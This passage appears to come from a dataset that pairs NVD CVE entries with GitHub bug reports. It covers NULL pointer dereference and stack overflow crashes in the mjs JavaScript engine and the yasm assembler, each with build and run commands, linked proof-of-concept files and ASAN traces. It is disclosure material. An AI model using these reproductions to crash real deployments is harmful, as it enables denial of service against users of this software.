(/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:14234 mjs_string_char_code_at ==28983==ABORTING ```
A NULL pointer dereference in the function mjs_string_char_code_at() mjs.c:14234
https://api.github.com/repos/cesanta/mjs/issues/169/comments
0
2021-05-19T08:45:40Z
2021-05-19T08:45:40Z
https://github.com/cesanta/mjs/issues/169
895,166,975
169
CVE-2021-33446
2022-07-26T13:15:08.967
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_next() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/168
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) I think it is probably a similar issue as [#105](https://github.com/cesanta/mjs/issues/105) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-12318-mjs_next-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==28197==ERROR: AddressSanitizer: SEGV on unknown address 0x000000007801 (pc 0x0000004328a5 bp 0x7ffdef0a53a0 sp 0x7ffdef0a5360 T0) #0 0x4328a4 in mjs_next test/mjs-uaf/build_asan/mjs.c:12512 #1 0x4250ee in mjs_execute test/mjs-uaf/build_asan/mjs.c:9555 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7fa1fb47f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:12512 mjs_next ==28197==ABORTING ```
A NULL pointer dereference in the function mjs_next() mjs.c:12512
https://api.github.com/repos/cesanta/mjs/issues/168/comments
0
2021-05-19T08:44:54Z
2021-05-19T08:44:54Z
https://github.com/cesanta/mjs/issues/168
895,166,227
168
CVE-2021-33447
2022-07-26T13:15:09.003
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_print() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/164
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7992-mjs_print-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9049==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000041dcd0 bp 0x7ffd941a9290 sp 0x7ffd941a8fc8 T0) #0 0x41dccf in mjs_print test/mjs-uaf/build_asan/mjs.c:8085 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fd3b806982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8085 mjs_print ==9049==ABORTING ```
A NULL pointer dereference in the function mjs_print() mjs.c:8085
https://api.github.com/repos/cesanta/mjs/issues/164/comments
0
2021-05-19T08:41:39Z
2021-05-19T08:41:39Z
https://github.com/cesanta/mjs/issues/164
895,162,768
164
CVE-2021-33448
2022-07-26T13:15:09.043
An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/170
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-module-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==10560==ERROR: AddressSanitizer: stack-overflow on address 0x7fffe9049390 (pc 0x7fffe9049390 bp 0x00000042572b sp 0x7fffe9049348 T0) #0 0x7fffe904938f (<unknown module>) SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==10560==ABORTING ```
AddressSanitizer: stack-buffer-overflow in <unknown module>
https://api.github.com/repos/cesanta/mjs/issues/170/comments
0
2021-05-19T08:46:26Z
2021-05-19T08:46:26Z
https://github.com/cesanta/mjs/issues/170
895,167,796
170
CVE-2021-33449
2022-07-26T13:15:09.083
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_part_get_by_offset() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/162" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/162
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7945-mjs_bcode_part_get_by_offset-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==7862==ERROR: AddressSanitizer: SEGV on unknown address 0x00000041bd8c (pc 0x00000041da25 bp 0x7ffcdf11d400 sp 0x7ffcdf11d138 T0) #0 0x41da24 in mjs_bcode_part_get_by_offset test/mjs-uaf/build_asan/mjs.c:8042 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7f524fe1682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8042 mjs_bcode_part_get_by_offset ==7862==ABORTING ```
A NULL pointer dereference in the function mjs_bcode_part_get_by_offset() mjs.c:8042
https://api.github.com/repos/cesanta/mjs/issues/162/comments
0
2021-05-19T08:40:02Z
2021-05-19T08:40:02Z
https://github.com/cesanta/mjs/issues/162
895,161,153
162
CVE-2021-33454
2022-07-26T13:15:09.297
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr_get_intnum() in libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/166" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/166
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#83](https://github.com/yasm/yasm/issues/83) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1377-yasm_expr_get_intnum-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==12603==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f421b49db7e bp 0x7ffc83d244d0 sp 0x7ffc83d244c0 T0) #0 0x7f421b49db7d in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1263 #1 0x7f421b487b9e in bc_align_finalize test/yasm-uaf/SRC_asan/libyasm/bc-align.c:108 #2 0x7f421b48c6ee in yasm_bc_finalize test/yasm-uaf/SRC_asan/libyasm/bytecode.c:176 #3 0x7f421b4b9bd2 in yasm_object_finalize test/yasm-uaf/SRC_asan/libyasm/section.c:528 #4 0x402ca9 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:527 #5 0x402ca9 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #6 0x7f421aeba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/libyasm/expr.c:1263 yasm_expr_get_intnum ==12603==ABORTING ```
A NULL pointer dereference in the function yasm_expr_get_intnum() libyasm/expr.c:1263
https://api.github.com/repos/yasm/yasm/issues/166/comments
4
2021-05-19T08:22:19Z
2024-03-22T14:15:04Z
https://github.com/yasm/yasm/issues/166
895,143,168
166
CVE-2021-33455
2022-07-26T13:15:09.337
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in do_directive() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/169
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#142](https://github.com/yasm/yasm/issues/142) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-2352-do_directive-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==14280==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f6361db4b98 bp 0x7ffe9673f060 sp 0x7ffe9673ece0 T0) #0 0x7f6361db4b97 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2355 #1 0x7f6361dc0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #2 0x7f6361da9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f6361d9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f6361d8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f6361d8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f6364ee182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2355 do_directive ==14280==ABORTING ```
A NULL pointer dereference in the function do_directive() modules/preprocs/nasm/nasm-pp.c:2355
https://api.github.com/repos/yasm/yasm/issues/169/comments
1
2021-05-19T08:25:00Z
2024-03-21T11:40:51Z
https://github.com/yasm/yasm/issues/169
895,145,758
169
CVE-2021-33456
2022-07-26T13:15:09.377
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in hash() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/175" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/175
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1114-hash-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==11392==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3f936ac15c bp 0x7ffc98fb57a0 sp 0x7ffc98fb5760 T0) #0 0x7f3f936ac15b in hash test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1114 #1 0x7f3f936b5ab9 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3103 #2 0x7f3f936c0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #3 0x7f3f936a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f3f9369b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f3f9368f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f3f9368f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f3f967b582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1114 hash ==11392==ABORTING ```
A NULL pointer dereference in the function hash() modules/preprocs/nasm/nasm-pp.c:1114
https://api.github.com/repos/yasm/yasm/issues/175/comments
1
2021-05-19T08:30:54Z
2024-03-21T11:46:29Z
https://github.com/yasm/yasm/issues/175
895,151,364
175
CVE-2021-33457
2022-07-26T13:15:09.417
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_mmac_params() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/171
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#151](https://github.com/yasm/yasm/issues/151) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-3857-expand_mmac_params-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==15506==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7fc6c3caf512 bp 0x7ffceebde200 sp 0x7ffceebde060 T0) #0 0x7fc6c3caf511 in expand_mmac_params test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3861 #1 0x7fc6c3cc08e8 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5078 #2 0x7fc6c3ca9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7fc6c3c9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7fc6c3c8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7fc6c3c8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7fc6c6db382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3861 expand_mmac_params ==15506==ABORTING ```
A NULL pointer dereference in the function expand_mmac_params() modules/preprocs/nasm/nasm-pp.c:3861
https://api.github.com/repos/yasm/yasm/issues/171/comments
2
2021-05-19T08:27:21Z
2024-03-21T11:48:05Z
https://github.com/yasm/yasm/issues/171
895,147,985
171
CVE-2021-33458
2022-07-26T13:15:09.457
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in find_cc() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/170
